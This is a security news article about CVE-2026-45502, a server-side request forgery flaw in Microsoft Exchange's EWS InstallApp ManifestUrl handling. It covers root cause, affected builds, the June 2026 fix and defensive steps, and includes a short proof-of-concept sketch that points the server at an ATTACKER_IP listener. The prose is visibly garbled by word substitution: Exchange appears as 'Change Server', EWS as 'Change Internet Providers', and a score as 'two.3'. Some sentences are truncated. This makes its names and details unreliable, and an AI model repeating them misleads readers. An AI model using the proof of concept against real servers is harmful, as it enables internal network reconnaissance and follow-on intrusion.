A proof-of-concept exploit has been launched for CVE-2026-45502, a server-side request forgery (SSRF) vulnerability within the Microsoft Change Server’s Change Internet Providers (EWS) InstallApp operation. This vulnerability poses dangers to organisations that haven’t but deployed the safety updates from June 2026.
The flaw impacts Change Server variations 2016 CU23, 2019 CU14 and CU15, and the Change Server Subscription Version RTM. An authenticated mailbox consumer can misuse the ManifestUrl parameter in an InstallApp SOAP name to compel the server to ship HTTP requests to attacker-controlled inner or exterior endpoints.
Microsoft Change Server SSRF Vulnerability
Microsoft charges the vulnerability with a CVSS 3.1 rating of 5.0 (medium), primarily based on standards comparable to community assault vector, low assault complexity, low required privileges, no consumer interplay, and a change in scope with restricted confidentiality impression.
A extra detailed CVSS 4.0 analysis assigns a rating of two.3 (low), whereas nonetheless acknowledging the proof-of-concept standing and potential real-world dangers in delicate community configurations, as reported by Aretiq.
The basis reason for the difficulty is inadequate URL validation inside the SynchronousDownloadData.DownloadDataFromUri() routine, which processes user-supplied ManifestUrl values throughout EWS add-in set up.
In on-premises Change deployments, the verify for intranet-address SSRF relies on a cloud-specific isBposUser flag that’s all the time set to false. In consequence, the internal-address blocking logic doesn’t function, permitting the server to belief arbitrary URLs offered by authenticated customers.
This logic error successfully transforms Change right into a community proxy that may entry inner HTTP providers, metadata endpoints comparable to 169.254.169.254, and different restricted sources from the server’s privileged community place.
Though the SSRF is essentially blind, researchers have proven that the response conduct, HTTP error codes, and timing will be utilized to map inner providers and make sure their reachability, making a dependable methodology for inner reconnaissance and potential chaining with different vulnerabilities.
To reveal exploitability, researchers revealed a PoC workflow that begins a easy HTTP listener after which sends a crafted EWS InstallApp request with a ManifestUrl pointing again to that listener, confirming the SSRF when the Change server initiates an inbound callback. A minimal pseudocode-style PoC fragment will be represented as follows, omitting full automation for security and brevity:
# Minimal PoC sketch (for lab validation solely)
soap_body = """
http://ATTACKER_IP:8888/ssrf-test
"""
# Ship SOAP physique to https://EXCHANGE/EWS/Change.asmx with authenticated EWS requestIn a susceptible surroundings, the Change server performs an HTTP GET to the desired URL, typically appending the corr=
In distinction, a patched system rejects the request earlier than establishing an outbound connection. The existence of such a PoC, even in restricted kind, will increase the probability of opportunistic probing and red-team adoption, particularly in environments the place Change servers have broad east–west visibility.dbugs.
Microsoft addressed CVE-2026-45502 within the June 9, 2026 Patch Tuesday launch through KB5094139 for Change Server Subscription Version and corresponding safety updates for Change 2016 and 2019.
The repair replaces the isBposUser-gated logic with a feature-flag-driven mannequin that enforces ManifestUrlValidation for all deployments and introduces ManifestUrlCheck, an allowlist that, by default, solely permits trusted authorities comparable to officeclient.microsoft.com, with non-compulsory, administrator-configurable entries.
Organizations ought to confirm that their Change builds meet or exceed the mounted variations documented in Microsoft’s steering and third-party advisories, and any occasion under these builds needs to be handled as susceptible till patched.
In parallel, defenders are urged to lock down outbound connectivity from Change servers, monitor for anomalous HTTP site visitors originating from Change to inner ranges or uncommon exterior hosts, and apply strict entry controls round EWS endpoints, on condition that legitimate credentials stay a prerequisite for exploitation.
Comply with us on Google Information, LinkedIn, and X to Get On the spot Updates and Set GBH as a Most popular Supply in Google.
